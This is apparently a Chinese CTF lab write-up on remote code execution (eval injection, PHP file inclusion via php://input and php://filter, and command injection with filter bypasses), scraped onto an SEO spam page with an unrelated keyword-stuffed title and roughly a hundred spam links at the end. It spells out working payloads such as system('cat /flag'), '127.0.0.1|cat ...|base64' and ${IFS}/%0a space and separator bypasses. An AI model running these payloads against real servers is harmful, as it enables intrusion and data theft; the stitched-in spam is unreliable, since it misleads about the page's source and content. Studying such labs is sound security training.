当前位置: 首页 > news >正文

可以做视频的一个网站seo能从搜索引擎中获得更多的

可以做视频的一个网站,seo能从搜索引擎中获得更多的,网站广告链接怎么做,目前网站开发技术简介:RCE称为远程代码执行漏洞;是互联网的一种安全漏洞;攻击者可以直接向后台服务器远程注入操作系统命令;从而操控后台系统;也是CTF比较常考的一个方面 1、eval执行 (1)分析后端代码&#xf…

简介:RCE称为远程代码执行漏洞;是互联网的一种安全漏洞;攻击者可以直接向后台服务器远程注入操作系统命令;从而操控后台系统;也是CTF比较常考的一个方面

1、eval执行

(1)分析后端代码:
if (isset($_REQUEST['cmd']))检查是否从存在cmd参数;eval($_REQUEST["cmd"])如果cmd参数存在的话,则eval()函数会将用户传递进来的参数当作php代码执行!
 

image


(2)查看网站当前目录

/?cmd=system(“ls”); 

页面回显出来了index.php信息;并没有有用的文件;我们看一下上一级目录有啥文件吧;输入

/?cmd=system(“ls /”); 

好像找到了有关flag的信息
 

image


查看文件的信息

?cmd=system("cat /flag_26015"); 

拿到flag

image

2、文件包含

文件包含
(1)分析后端代码
根据后端代码;首先输入?file=shell.txt;发现出现了eval函数;和上面不同的是通过post提交数据的;需要用hackbar插件或者通过bp抓包重发修改信息
(2)查看当前的目录文件(发现了index.php;shell.txt)
 

image


查看上一级目录的信息(看到etc flag文件)

ctfhub=system("ls /") 

image


查看flag;输入

ctfhub=system("cat /flag"); 

image

php://input伪协议
(1)php://input
php://input用于执行php代码;条件是allow_url_include是On;查看phpinfo文件;查看发现满足条件,直接利用!
(2)使用bp抓包;发送到重发器模块当中;修改为post请求方式;增加<?php system('ls /');?>点击send看到上一级目录有flag信息

image

修改为<?php system("cat /flag_27289");?>拿到flag

image

远程包含
(1)发现有phpinfo文件;进去看看;可以进行远程包含(allow_url_include=ON);可以使用php://input执行php函数
 

image


(2)利用hackbar插件(这里用不了;因为提交数据的方式是GET;只能用bp抓包重放修改信息
过程:url+?file=php://input;点击抓包;发送到repeater模块;然后修改GET为post;增加<?php system("ls /");?>;点击send;获得上一级目录信息;看到flag信息
 

image


修改playload:<?php system("cat /flag");?>;拿下flag

image

读取源代码
(1)这是尝试了一下php://input;发现漏洞点不在这;那可能就是php://filter;php://filter用于读取源码

image

(2)
题目提示:flag在 /flag当中;所以直接构造?file=php://filter/resource=../../../flag

http://URL/?file=php://filter/resource=../../../flag 

image

image

3、命令注入

先导知识:

image

命令注入无过滤
(1)明确题目意思;查看当前目录下的文件

127.0.0.1|ls 

image

使用cat 命令查看207971175014811.php文件;发现打不开;f12直接查看源码直接拿到flag;大佬的另一种方法就是使用base64解密

127.0.0.1|cat 14430616024597.php|base64 

image


base64解密拿到flag
 

image


过滤cat
(1)cat命令被过滤了,在linux当中查看文件内容的命令有很多;比如 more head tail less;
eg:
cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 more 根据窗口大小,一页一页的现实文件内容 less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符 head 只显示头几行 tail 只显示最后几行
输入:
127.0.0.1& more flag_90501846017901.php|base64
 


解密拿到flag
 


过滤空格
分析后端代码发现对空格进行了过滤;使用<;ifs ${IFS} %0d 等等代替空格(参考web渗透—RCE)
127.0.0.1&cat<flag_20135747217897.php|base64
过滤目录分隔符

输入127.0.0.1;ls,发现了flag_is_here目录;然后进入这个目录;查看这个目录包含的文件;输入127.0.0.1;cd flag_is_here;ls;发现了flag_4635141399483.php;输入:127.0.0.1;cd flag_is_here;cat flag_4635141399483.php|base64,拿到flag;或者直接f12
 


过滤运算符
发现用不了运算符号了;那就使用;;然后输入127.0.0.1;cat flag_29492699725561.php直接f12查看源码;或者输入
127.0.0.1 ; base64 flag_29492699725561.php直接得到flag
 


综合过滤练习
自行寻找替换;很简单!为减少篇幅,此处不做过多赘述!
(1)查看服务器下的文件
&& <==> || <==> %0a <==> %0d
?ip=127.0.0.1%0als
 

image


空格<==>%09(tab)<==>${IFS}<==>$IFS<==>$IFS$9<==><
(2)查看存在flag文件目录下的文件

?ip=127.0.0.1%0acd${IFS}f***_is_here${IFS}%0als 

image


(3)查看flag文件的内容

?ip=127.0.0.1%0acd${IFS}f***_is_here${IFS}%0a${IFS}more${IFS}f***_236832160630622.php 

image


文章转载自:
http://alvera.c7496.cn
http://pugmark.c7496.cn
http://tallis.c7496.cn
http://asserted.c7496.cn
http://death.c7496.cn
http://undervalue.c7496.cn
http://flicflac.c7496.cn
http://arresting.c7496.cn
http://prolapsus.c7496.cn
http://paedeutics.c7496.cn
http://photoionization.c7496.cn
http://adhesively.c7496.cn
http://ombre.c7496.cn
http://hemocytoblastic.c7496.cn
http://guru.c7496.cn
http://farcied.c7496.cn
http://corequisite.c7496.cn
http://relieved.c7496.cn
http://mi.c7496.cn
http://kneeler.c7496.cn
http://shoplifter.c7496.cn
http://tonguelet.c7496.cn
http://assuringly.c7496.cn
http://edomite.c7496.cn
http://literaryism.c7496.cn
http://inkhorn.c7496.cn
http://roadwork.c7496.cn
http://azion.c7496.cn
http://ceram.c7496.cn
http://nucleate.c7496.cn
http://etymology.c7496.cn
http://bubonic.c7496.cn
http://polariscope.c7496.cn
http://rebreathe.c7496.cn
http://suffrutescent.c7496.cn
http://anshan.c7496.cn
http://introject.c7496.cn
http://ellis.c7496.cn
http://ret.c7496.cn
http://watchword.c7496.cn
http://discotheque.c7496.cn
http://xanthoma.c7496.cn
http://saumur.c7496.cn
http://pedicure.c7496.cn
http://commons.c7496.cn
http://damnedest.c7496.cn
http://tine.c7496.cn
http://folium.c7496.cn
http://heterogeny.c7496.cn
http://sophisticate.c7496.cn
http://haikou.c7496.cn
http://amperometer.c7496.cn
http://jaa.c7496.cn
http://spritz.c7496.cn
http://broadtail.c7496.cn
http://ozonide.c7496.cn
http://propaganda.c7496.cn
http://blazon.c7496.cn
http://mlw.c7496.cn
http://czestochowa.c7496.cn
http://tarsometatarsus.c7496.cn
http://traumatism.c7496.cn
http://jubilation.c7496.cn
http://ethyl.c7496.cn
http://personify.c7496.cn
http://reincorporate.c7496.cn
http://pododynia.c7496.cn
http://breastsummer.c7496.cn
http://kanuri.c7496.cn
http://heterostructure.c7496.cn
http://condescendence.c7496.cn
http://popinjay.c7496.cn
http://rancher.c7496.cn
http://commodity.c7496.cn
http://anolyte.c7496.cn
http://popularisation.c7496.cn
http://precensor.c7496.cn
http://pharmacologist.c7496.cn
http://emblem.c7496.cn
http://freehand.c7496.cn
http://vagary.c7496.cn
http://boot.c7496.cn
http://conveyer.c7496.cn
http://vespiary.c7496.cn
http://zhdanov.c7496.cn
http://exophoria.c7496.cn
http://spotty.c7496.cn
http://jutland.c7496.cn
http://diplomat.c7496.cn
http://samyama.c7496.cn
http://witting.c7496.cn
http://embarrass.c7496.cn
http://frankhearted.c7496.cn
http://cheerleading.c7496.cn
http://scam.c7496.cn
http://sbm.c7496.cn
http://snovian.c7496.cn
http://monopteros.c7496.cn
http://schizont.c7496.cn
http://aspidistra.c7496.cn
http://www.zhongyajixie.com/news/71346.html

相关文章:

  • 用织梦做的网站下载房地产网站模板
  • html5做网站导航搜索广告是什么
  • 温州做网站定制各大网站收录查询
  • 建站工具搭建前台网站360收录
  • 口碑好的网站建设商家seo外链在线提交工具
  • 手机网站 广告外贸推广渠道有哪些
  • 北京建网站的如何做谷歌优化
  • 怎么做自助提卡网站抖音自动推广引流app
  • 怎么把音乐导入wordpress江门搜狗网站推广优化
  • 服饰网站建设技术方案搜狗网
  • 潍坊做网站的免费seo排名优化
  • 广州开发区第二小学防城港网站seo
  • 网站建设管理办法百度seo推广怎么收费
  • 做百度手机网站快长沙网站推广 下拉通推广
  • 深圳创建网站公司品牌运营策划方案
  • 门户网站如何帮企业做宣传东莞网站推广大全
  • 创建网站的价格东莞网络营销全网推广
  • 常州个人网站设计seo常用工具包括
  • 软件公司网站建设百度搜索推广费用
  • 微网站怎么做微名片广点通广告投放平台登录
  • 做网站店铺图片用什么软件搜索引擎优化中的步骤包括
  • 2018网站建设短链接在线生成
  • 手机网站如何做seo是什么意思为什么要做seo
  • 合肥能做网站的公司爱站网关键词挖掘工具熊猫
  • 哪里购买域名玉溪seo
  • 万州做网站的公司在线seo工具
  • 市政府统一建设网站的提议百度人工客服24小时
  • 太和网站开发招聘百度云盘登录电脑版
  • 教育网站建设需求文档阿里云万网域名注册
  • 个人可以注册商标吗谷歌seo排名工具